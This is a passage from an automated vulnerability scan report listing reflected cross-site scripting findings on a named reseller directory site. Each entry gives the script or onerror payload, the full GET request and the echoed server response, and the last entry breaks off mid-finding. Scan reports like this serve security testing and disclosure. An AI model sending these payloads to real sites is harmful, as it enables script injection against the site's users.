<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /taga584a<script>alert(1)</script>b39fcc11bcf/dating was not found on this server.</p>
...[SNIP]...

2.4224. http://www.resellerbase.com/tag/dating [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/tag/dating

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as text between TITLE tags. The payload 40946</title><img%20src%3da%20onerror%3dalert(1)>00cf8fbf466f9fd56 was submitted in the REST URL parameter 2. This input was echoed as 40946</title><img src=a onerror=alert(1)>00cf8fbf466f9fd56 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /tag/dating40946</title><img%20src%3da%20onerror%3dalert(1)>00cf8fbf466f9fd56?sort_by=title&sort_order=asc HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/tag/dating
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.1 200 OK
Date: Wed, 17 Nov 2010 23:57:40 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 9818

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Browse by Tag: dating40946</title><img src=a onerror=alert(1)>00cf8fbf466f9fd56</title>
...[SNIP]...

2.4225. http://www.resellerbase.com/tag/dating [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/tag/dating

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as text between TITLE tags. The payload 8acc8</title><img%20src%3da%20onerror%3dalert(1)>4e494e902d6 was submitted in the REST URL parameter 2. This input was echoed as 8acc8</title><img src=a onerror=alert(1)>4e494e902d6 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /tag/dating8acc8</title><img%20src%3da%20onerror%3dalert(1)>4e494e902d6 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/14/datingrev-com.html
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.1 200 OK
Date: Wed, 17 Nov 2010 23:56:20 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 9806

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Browse by Tag: dating8acc8</title><img src=a onerror=alert(1)>4e494e902d6</title>
...[SNIP]...

2.4226. http://www.resellerbase.com/tag/dating [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/tag/dating

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 159ea<img%20src%3da%20onerror%3dalert(1)>ac76462cb1fd32472 was submitted in the REST URL parameter 2. This input was echoed as 159ea<img src=a onerror=alert(1)>ac76462cb1fd32472 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /tag/dating159ea<img%20src%3da%20onerror%3dalert(1)>ac76462cb1fd32472?sort_by=title&sort_order=asc HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/tag/dating
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.1 200 OK
Date: Wed, 17 Nov 2010 23:57:33 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 9802

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Browse by Tag: datin
...[SNIP]...
<td height="24" colspan="2" class="tbl_caption"> Web Links [Tag : dating159ea<img src=a onerror=alert(1)>ac76462cb1fd32472]</td>
...[SNIP]...

2.4227. http://www.resellerbase.com/tag/dating [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/tag/dating

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload ab487<img%20src%3da%20onerror%3dalert(1)>0baaef7ca88 was submitted in the REST URL parameter 2. This input was echoed as ab487<img src=a onerror=alert(1)>0baaef7ca88 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /tag/datingab487<img%20src%3da%20onerror%3dalert(1)>0baaef7ca88 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/14/datingrev-com.html
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.1 200 OK
Date: Wed, 17 Nov 2010 23:56:15 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 9790

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Browse by Tag: datin
...[SNIP]...
<td height="24" colspan="2" class="tbl_caption"> Web Links [Tag : datingab487<img src=a onerror=alert(1)>0baaef7ca88]</td>
...[SNIP]...

2.4228. http://www.resellerbase.com/tag/domain [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/tag/domain

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 8fa69<script>alert(1)</script>4376a856301 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /tag8fa69<script>alert(1)</script>4376a856301/domain HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/17/resellerclub-com.html
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:57:07 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /tag8fa69<script>alert(1)</script>4376a856301/domain was not found on this server.</p>
...[SNIP]...

2.4229. http://www.resellerbase.com/tag/domain [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/tag/domain

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 6d775<script>alert(1)</script>d05d5eb6c7f7729e9 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /tag6d775<script>alert(1)</script>d05d5eb6c7f7729e9/domain?sort_by=title&sort_order=asc HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/tag/domain
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:58:18 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /tag6d775<script>alert(1)</script>d05d5eb6c7f7729e9/domain?sort_by=title&sort_order=asc was not found on this server.</p>
...[SNIP]...

2.4230. http://www.resellerbase.com/tag/domain [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/tag/domain

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 18c5c<img%20src%3da%20onerror%3dalert(1)>f337ab86790 was submitted in the REST URL parameter 2. This input was echoed as 18c5c<img src=a onerror=alert(1)>f337ab86790 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /tag/domain18c5c<img%20src%3da%20onerror%3dalert(1)>f337ab86790 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/17/resellerclub-com.html
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.1 200 OK
Date: Wed, 17 Nov 2010 23:57:23 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 9790

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Browse by Tag: domai
...[SNIP]...
<td height="24" colspan="2" class="tbl_caption"> Web Links [Tag : domain18c5c<img src=a onerror=alert(1)>f337ab86790]</td>
...[SNIP]...

2.4231. http://www.resellerbase.com/tag/domain [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/tag/domain

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload d1860<img%20src%3da%20onerror%3dalert(1)>1d510a546a8242223 was submitted in the REST URL parameter 2. This input was echoed as d1860<img src=a onerror=alert(1)>1d510a546a8242223 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /tag/domaind1860<img%20src%3da%20onerror%3dalert(1)>1d510a546a8242223?sort_by=title&sort_order=asc HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/tag/domain
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.1 200 OK
Date: Wed, 17 Nov 2010 23:58:39 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 9802

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Browse by Tag: domai
...[SNIP]...
<td height="24" colspan="2" class="tbl_caption"> Web Links [Tag : domaind1860<img src=a onerror=alert(1)>1d510a546a8242223]</td>
...[SNIP]...

2.4232. http://www.resellerbase.com/tag/domain [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/tag/domain

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as text between TITLE tags. The payload 69828</title><img%20src%3da%20onerror%3dalert(1)>56be76df34300d0f was submitted in the REST URL parameter 2. This input was echoed as 69828</title><img src=a onerror=alert(1)>56be76df34300d0f in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /tag/domain69828</title><img%20src%3da%20onerror%3dalert(1)>56be76df34300d0f?sort_by=title&sort_order=asc HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/tag/domain
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.1 200 OK
Date: Wed, 17 Nov 2010 23:58:46 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 9816

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Browse by Tag: domain69828</title><img src=a onerror=alert(1)>56be76df34300d0f</title>
...[SNIP]...

2.4233. http://www.resellerbase.com/tag/domain [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/tag/domain

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as text between TITLE tags. The payload ed97e</title><img%20src%3da%20onerror%3dalert(1)>c4a31f3c478 was submitted in the REST URL parameter 2. This input was echoed as ed97e</title><img src=a onerror=alert(1)>c4a31f3c478 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /tag/domained97e</title><img%20src%3da%20onerror%3dalert(1)>c4a31f3c478 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/17/resellerclub-com.html
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.1 200 OK
Date: Wed, 17 Nov 2010 23:57:27 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 9806

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Browse by Tag: domained97e</title><img src=a onerror=alert(1)>c4a31f3c478</title>
...[SNIP]...

2.4234. http://www.resellerbase.com/tag/domain+name [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/tag/domain+name

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload c5e19<script>alert(1)</script>58066d15143a843c4 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /tagc5e19<script>alert(1)</script>58066d15143a843c4/domain+name?sort_by=title&sort_order=asc HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/tag/domain+name
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:57:57 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /tagc5e19<script>alert(1)</script>58066d15143a843c4/domain+name?sort_by=title&sort_order=asc was not found on this server.</p>
...[SNIP]...

2.4235. http://www.resellerbase.com/tag/domain+name [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/tag/domain+name

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload c42d6<script>alert(1)</script>7df44f2fd6c was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /tagc42d6<script>alert(1)</script>7df44f2fd6c/domain+name HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/17/resellerclub-com.html
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:56:45 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /tagc42d6<script>alert(1)</script>7df44f2fd6c/domain+name was not found on this server.</p>
...[SNIP]...

2.4236. http://www.resellerbase.com/tag/domain+name [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/tag/domain+name

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as text between TITLE tags. The payload bc8f7</title><img%20src%3da%20onerror%3dalert(1)>9385b6c8934e2123 was submitted in the REST URL parameter 2. This input was echoed as bc8f7</title><img src=a onerror=alert(1)>9385b6c8934e2123 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /tag/domain+namebc8f7</title><img%20src%3da%20onerror%3dalert(1)>9385b6c8934e2123?sort_by=title&sort_order=asc HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/tag/domain+name
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.1 200 OK
Date: Wed, 17 Nov 2010 23:58:22 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 9826

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Browse by Tag: domain namebc8f7</title><img src=a onerror=alert(1)>9385b6c8934e2123</title>
...[SNIP]...

2.4237. http://www.resellerbase.com/tag/domain+name [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/tag/domain+name

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as text between TITLE tags. The payload 7c36c</title><img%20src%3da%20onerror%3dalert(1)>35094792377 was submitted in the REST URL parameter 2. This input was echoed as 7c36c</title><img src=a onerror=alert(1)>35094792377 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /tag/domain+name7c36c</title><img%20src%3da%20onerror%3dalert(1)>35094792377 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/17/resellerclub-com.html
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.1 200 OK
Date: Wed, 17 Nov 2010 23:57:08 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 9816

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Browse by Tag: domain name7c36c</title><img src=a onerror=alert(1)>35094792377</title>
...[SNIP]...

2.4238. http://www.resellerbase.com/tag/domain+name [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/tag/domain+name

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload cd6c3<img%20src%3da%20onerror%3dalert(1)>b0d39c0994e was submitted in the REST URL parameter 2. This input was echoed as cd6c3<img src=a onerror=alert(1)>b0d39c0994e in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /tag/domain+namecd6c3<img%20src%3da%20onerror%3dalert(1)>b0d39c0994e HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/17/resellerclub-com.html
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.1 200 OK
Date: Wed, 17 Nov 2010 23:57:03 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 9800

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Browse by Tag: domai
...[SNIP]...
<td height="24" colspan="2" class="tbl_caption"> Web Links [Tag : domain namecd6c3<img src=a onerror=alert(1)>b0d39c0994e]</td>
...[SNIP]...

2.4239. http://www.resellerbase.com/tag/domain+name [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/tag/domain+name

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 17243<img%20src%3da%20onerror%3dalert(1)>86febc641df69cf16 was submitted in the REST URL parameter 2. This input was echoed as 17243<img src=a onerror=alert(1)>86febc641df69cf16 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /tag/domain+name17243<img%20src%3da%20onerror%3dalert(1)>86febc641df69cf16?sort_by=title&sort_order=asc HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/tag/domain+name
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.1 200 OK
Date: Wed, 17 Nov 2010 23:58:16 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 9812

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Browse by Tag: domai
...[SNIP]...
<td height="24" colspan="2" class="tbl_caption"> Web Links [Tag : domain name17243<img src=a onerror=alert(1)>86febc641df69cf16]</td>
...[SNIP]...

2.4240. http://www.resellerbase.com/tag/domain+names [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/tag/domain+names

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload bc8d2<script>alert(1)</script>8775039357c was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /tagbc8d2<script>alert(1)</script>8775039357c/domain+names HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 21:28:19 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /tagbc8d2<script>alert(1)</script>8775039357c/domain+names was not found on this server.</p>
...[SNIP]...

2.4241. http://www.resellerbase.com/tag/domain+names [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/tag/domain+names

Issue detail

